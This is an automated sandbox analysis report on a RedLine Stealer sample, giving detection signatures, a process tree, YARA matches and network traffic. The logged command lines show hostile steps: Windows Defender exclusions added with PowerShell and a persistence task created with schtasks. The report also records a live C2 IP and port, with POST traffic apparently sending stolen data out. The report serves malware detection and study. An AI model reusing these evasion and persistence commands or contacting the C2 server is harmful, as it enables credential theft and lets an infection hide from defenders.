Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w4XFffGDz1.exe

Overview

General Information

Sample name:w4XFffGDz1.exe
renamed because original name is a hash value
Original sample name:2185ecde5380054ad075b7a25ae0ea51.exe
Analysis ID:1457840
MD5:2185ecde5380054ad075b7a25ae0ea51
SHA1:caa1b832574fc3050af5f97b6deabc21398b5c47
SHA256:e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • w4XFffGDz1.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\w4XFffGDz1.exe" MD5: 2185ECDE5380054AD075B7A25AE0EA51)
    • PO.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)
      • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • schtasks.exe (PID: 7908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PO.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AJzHYZtQIb.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe MD5: 86F98523CEB67DF5CC3431A839F63134)
    • schtasks.exe (PID: 8028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AJzHYZtQIb.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 21 entries
              SourceRuleDescriptionAuthorStrings
              7.2.PO.exe.3c18d70.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.PO.exe.3c18d70.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  7.2.PO.exe.3c00f50.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    7.2.PO.exe.3c18d70.3.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                    • 0x117ca:$a4: get_ScannedWallets
                    • 0x10628:$a5: get_ScanTelegram
                    • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                    • 0xf26a:$a7: <Processes>k__BackingField
                    • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                    • 0xeb9e:$a9: <ScanFTP>k__BackingField
                    7.2.PO.exe.3c00f50.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 15 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeVirustotal: Detection: 58%Perma Link
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeVirustotal: Detection: 58%Perma Link
                      Source: w4XFffGDz1.exeReversingLabs: Detection: 68%
                      Source: w4XFffGDz1.exeVirustotal: Detection: 67%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeJoe Sandbox ML: detected
                      Source: w4XFffGDz1.exeJoe Sandbox ML: detected
                      Source: w4XFffGDz1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: w4XFffGDz1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001986E8 FindFirstFileExA,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 4x nop then jmp 07A5794Bh
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 4x nop then jmp 07AA6DBBh

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: 45.137.22.67:55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                      Source: global trafficTCP traffic: 192.168.2.5:49710 -> 45.137.22.67:55615
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559666Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559658Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559133Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559125Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.67:55615
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.67:55615/
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.67:55615t-
                      Source: PO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: PO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: PO.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
